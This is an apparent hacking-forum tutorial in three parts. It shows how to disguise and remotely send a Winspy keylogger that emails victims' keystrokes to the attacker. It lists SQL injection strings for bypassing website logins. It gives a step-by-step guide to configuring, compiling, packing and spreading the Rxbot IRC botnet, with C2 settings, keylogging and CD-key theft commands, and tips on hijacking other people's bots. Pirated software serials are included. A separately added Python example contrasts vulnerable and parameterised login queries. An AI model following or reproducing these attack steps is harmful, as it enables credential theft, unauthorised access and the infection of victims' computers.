After downloading this software, run the .exe. You will be asked to register yourself, where you will be asked to enter a user ID and password. Remember this password, as it will be required when uninstalling the software.

Now, another box will come up, explaining the hot keys (Ctrl + Shift + F12) used to start the Winspy keylogger software.

Now, on pressing the hot keys, a login box will come up asking for the user ID and password. Enter them and click OK.

Now, Winspy's main screen will be displayed as shown in the image below.

Select Remote at top, then Remote install.

On doing this, you will get a popup box as shown in the image. Now, fill in the following information in this box.

User - type in the victim's name
File name - Name the file to be sent. Use a name such that the victim will love to accept it.
File icon - Keep it the same
Picture - select the picture you want to apply to the keylogger.
Email keylog to - Enter your email address. Hotmail and Yahoo do not accept keylog files, so enter another email address.
That's it. This much is enough. If you want, you can change other settings also.
After you have completed changing settings, click on "Create Remote file". Now just add your picture to a WinRAR archive. Now, all you have to do is send this keylog file to your victim. When the victim opens this file, all keystrokes typed by the victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even his Myspace account password.

Bypass login of web sites by SQL injection

For those of you who don't already know, SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.

A database is a table full of private and public site information such as usernames, products, etc. Databases are fundamental components of Web applications. They enable Web applications to store data, preferences and content elements. Using SQL, web applications interact with databases to dynamically build customized data views for each user.

Data types:
mysql.user
mysql.host
mysql.db
Bypassing login scripts:
SQL injection strings (the DB doesn't matter):

') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1

Note: having 1=1--

Example:

Login: hi'or 1=1--
Password: hi'or 1=1--
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database


The input validation can also be bypassed because of bad programming techniques. In most websites, input validation is done at the client end, i.e. at the browser end using JavaScript. What you can do is open the page and then save the page to your hard disk. Then open the HTML page in any HTML editor (say FrontPage or Dreamweaver or even Notepad), delete the JavaScript input validation code, and then simply go ahead.
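The following is an added example, not code from the original page: it shows why the login-bypass strings listed above work when user input is chained into the SQL text, why a parameterised query stops them, and why that server-side control matters when client-side JavaScript validation can simply be deleted. The in-memory SQLite database and its two users are constructed sample data.

```python
"""Login check: string-built SQL beside a parameterised query (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data; a real application would store password hashes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The pattern the text describes: user input becomes part of the statement.
    # With username  hi' or 1=1--  the WHERE clause turns into
    #   username = 'hi' or 1=1   (everything after -- is a comment)
    # which is true for every row, so the first user is "logged in".
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders: the driver passes the values separately from the SQL text,
    # so quotes and comment markers are just characters to compare against.
    # This check runs on the server, so it cannot be removed by editing the
    # page's JavaScript the way client-side validation can.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


# Three of the strings from the list above, used as username/password pairs.
BYPASS_ATTEMPTS = [
    ("hi' or 1=1--", "anything"),
    ("admin'--", ""),
    ("' or 'x'='x", "' or 'x'='x"),
]


def compare(conn: sqlite3.Connection) -> dict:
    # Returns, per attempt, whether each implementation lets the login through.
    return {u: (login_vulnerable(conn, u, p), login_safe(conn, u, p))
            for u, p in BYPASS_ATTEMPTS}


if __name__ == "__main__":
    db = make_db()
    for user, (vuln, safe) in compare(db).items():
        print(f"{user!r:24} string-built: {vuln}  parameterised: {safe}")
```

Each bypass string logs in through `login_vulnerable` and is rejected by `login_safe`, while real credentials still work in both.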

How To Create And Compile Botnets

I found a nice tutorial that helps you with the basics of botnets. In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3, a stable mod of rxbot that is 100% functional and not crippled. If you want to download it, you can below:

Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source, but it would ultimately be best to compile your own bot or get a private one.

Q: What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it, a "bot" joins your channel on IRC (secretly; they don't know this). Once done, the computer is now referred to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again, depending on the source you can:
Keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest CD keys and game keys or even cracks, passwords, AIM screen names, emails; you can also spam, flood, DDoS, ping, packet, yada yada; some have built-in MD5 crackers, and clone functions to spam other IRC channels and overrun a channel and even perform IRC "takeovers".
Once again, depending on the bot it may be able to kill other competitor bots.
Or even kill AV/FW upon startup.
Add itself to the registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible!

There's the infected computers ("bots"), the attacker, the server, and the victim.


Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."


Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial

-----------------------------
Here we go ladies and gentlemen :)
Follow the tutorial:
-----------------------------

I. Setting up the C++ compiler: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

4. After that Download and install:

Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compiler (easy)

1. Open up Microsoft Visual C++ Compiler 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)

(it does not matter what's below those lines)
---------------------------------------
III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3

2. You should see an Rxbot 7.6 folder
3. Open the configs.h file in the Rxbot 7.6 folder and edit these lines only:


Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOU'RE DONE!!!! Now get the rbot and pack it (use the tool in the third post, open rbot and click "Protect") and send it to some idiots. Follow the tutorial at the top to learn how to spread. Some good ways are: torrents, AIM, friends, Myspace, school computers, and P2P, but there are more ways. ENJOY!
-------------------------------------
Command list
Download Command list

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an ~censored~; it is easy to steal bots. All you need is the IRC server address and maybe a key.
To steal bots, watch for the @login key. One must upload their bot to a direct link (tdotnetwork is excellent)
and update the channel topic and run:


The http://mybot.com is your bot's download link and the 82 can be any number(s).
Now steal their bots and have them join your channel.
To find the server address you need their botnet. Then take their bot and open it in the server editor. The address will be shown, and so will the password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your channel, right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
This way no one besides you or another op can set the channel topic.
Note: Setting "Moderated" is good for when you are not there, because anyone who is not voiced (+v) or an op (+o) cannot talk. They will still log in and follow commands; however, there will be no output.
------------------------------------------------------------------------
Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to set up a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he knows that the IRC server is not doing anything illegal. If an admin refuses, don't get angry. It is his/her server, after all.